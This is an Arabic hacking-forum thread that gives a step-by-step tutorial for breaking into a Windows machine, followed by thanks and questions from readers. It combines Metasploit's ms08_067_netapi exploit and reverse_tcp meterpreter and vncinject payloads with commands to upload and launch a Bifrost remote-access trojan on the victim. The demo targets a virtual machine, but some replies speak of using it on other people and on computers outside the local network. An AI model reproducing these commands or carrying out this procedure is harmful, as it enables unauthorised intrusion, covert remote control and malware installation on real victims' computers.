|
الإختراق القاتل metasploit+bifrost معا وأنا أفكر طرأت لي فكرة لا أعرف إن كانت طرحت بعد المهم هي إختراق الضحية بالميتا ورفع سيرفر بيفروست وكما سأتحدث عن سيطرة الجهاز بإستخدام playoad windows/vncinject وسأجربها علي جهاز إفتراضي كفانا من الكلام ولنبدأ. من يرد التجربة علي جهازه فليقم بتحميل vbox أو ليقرأ موضوعي السابق علي هذا الرابط والشرح سيكون بالصور الشرح بالفيديو http://img194.imageshack.us/img194/9...0702183620.png إضغط علي window وبعد ذلك علي console ستفتح لنا النافذة التالية نكتب show exploits http://img27.imageshack.us/img27/5264/exploitscmd3.png ونختار windows/smb/ms08_067_netapi show payloads http://img25.imageshack.us/img25/3329/payloads.png ونختار windows/meterpreter/reverse_tcp أو نختارها مباشرة كما ف الصورة http://img16.imageshack.us/img16/7027/setexploit5.png والآن نقوم بتحديد IP الضحية وهو في هذه الحالة جهازي الإفتراضي RHOST = 192.168.56.101 ولا تنسي أن تضع قم جهازك LHOST =192.168.56.1 لتطبيق الثغرة نكتب exploit وبعد ذلك enter http://img139.imageshack.us/img139/4...chexploit6.png كما ترون في الصورة لقد نجحنا في تطبيق الثغرة والدخول لي الجهاز عن طريق port 445 ************************************************** ********************** لنري خيارات نكتب help والآن سنقوم برفع السيرفر بالأمر upload -r server.exe c:\ كما في الصورة التالية ولكن قبل تحميل السيرفر يجب نسخه في مجلد C:\Program Files\****sploit\Framework3 http://img200.imageshack.us/img200/9...oadserver6.png ************************************************** *********************** بعد رفع السيرفر نشغل برنامج الدوس للضحية بالأوامرالتالية: use -m process execute -f cmd.exe -c interact 3 كما في الصورة حسب رقم channel أو session المفتوح http://img37.imageshack.us/img37/6270/73006251.png لتشغيل السيرفر start server.exe ************************************************** ************************ وكما توضح الصورة نجاح تحميل السيرفر http://img213.imageshack.us/img213/9439/70700213.png والصور تعبر عن نفسها http://img190.imageshack.us/img190/6250/30769969.png شاشة الضحية http://img197.imageshack.us/img197/482/55987753.png ************************************************** ************************ لتطبيق payload windows/vncinject نقوم بنفس الخطوات السابقة ولكن بإستبدال payload windows/meterpreter/reverse_tcp set payload windows/vncinject/reverse_tcp بتطبيق الثغرة ستفتح لنا الشاشة التالية http://img269.imageshack.us/img269/1700/11vncinject.png |
شكرا عل الموضوع لكن حسب علمي عندك خطأ في الموضوع set windows/meterpreter/reverse_tcp تبدل بـ set windows/vncinject/reverse_tcp |
مشكور لقد تم تصحيح الخطأقتال2 |
مشكور لكن ليش ترفع سيرفر ادا كنت بتعمل vnc inject و تكون متحكم بكامل الجهاز |
اقتباس:
|
اقتباس:
|
حلووووووووووو الموضوووع ويستاااااااااهل التثبيت مشكوووووووووووور اخي وتقبل مروري يله سلام |
موضوع رائع سأحاول تجربته و ان نجحت العملية ستكو ن انت يا punisher77 اول ضحية لي لووللووللوول مشكور اخي |
مشكووووووووور |
مشكوووووووووووووووور اخوي على الشرح الرائع وكنت نااوي ارد من زماان بس كنت مشغوول |
مشكوووور أخي |
ونختار windows/smb/ms08_067_netapi show payloads http://img27.imageshack.us/img27/5264/exploitscmd3.png ونختار windows/meterpreter/reverse_tcp أو نختارها مباشرة كما ف الصورة http://img16.imageshack.us/img16/7027/setexploit5.png ارجوا ان توضحوا الصورتين فانا لم افهمهمــ ،، لانه لايمكن الضغط على windows/smb/ms08_067_netapi و windows/meterpreter/reverse_tcp ارجوا ان توضحوا لي وشكرا |
تشكر أخوي :a15::a15::a15::a15::a15: |
مشكور يااخي عاي الموضوع |
مشكور علي الردود كنت مشغولا أخي يجب أن تنسخ الثغرة وتضعها هنا> msf(ms08_067_netapi |
يسلمووووووووو اخوووووووووووي ع شرررررررح كثثر من روعه لي بآك بعد التطبيق |
اخي شكرا سؤالي هل تطلع الشاشة عند الصحية ام تبقى مخفية مثل برامج الاختراق العادية |
طريقه رائعه شكرا لك يا مبدع جاري التجربه |
مشكور الله يعطيك العافيه |
يعطيك ألف عافية يا punisher77 جاري التطبيق |
موضوع رائع سأحاول تجربته |
و الله موشوع قمة |
help when set exploit the soft tell UNKOWN COMMAND |
هذا هو الميتاسبلويت تبعي كيف اشتغل بيه http://www.imagup.com/pics/1272954757.html |
رابط الصورة http://www.imagup.com/pics/1272954757.html |
LOL IL YA TJRS DES PRBLM [warning]null[/warning] |
thnx |
مشكور يالغالي يعطيك العافيه على مجهودك ماقصرت ربي يوفقك تحيااااتي |
[align=center] شكرا وبارك الله فيك[/align] |
THNXXX BROTHER YOU ARE GREAD ;;) |
مشكوور اخي لكن عندي مشكلة |
مشــــــــكوورر و ما قصرت |
مشكوووور !! لكن هل يمكنني اختراق حاسوب خارج الشبكة بهذه الطريقة ؟؟، |
MACHKOURRRRRRRRRRRRRRR |
مشكووور اخي و بارك الله فيك تحياتي لكـ :) |
يعطـيك العافـيه اخوي punisher77 مموضووع مميز.، تم تقيمك . 5/5 تقبل مروري. ، :heart: |
مشكور على الموضوع |
| الساعة الآن 05:30 PM |
[ vBspiders.Com Network ]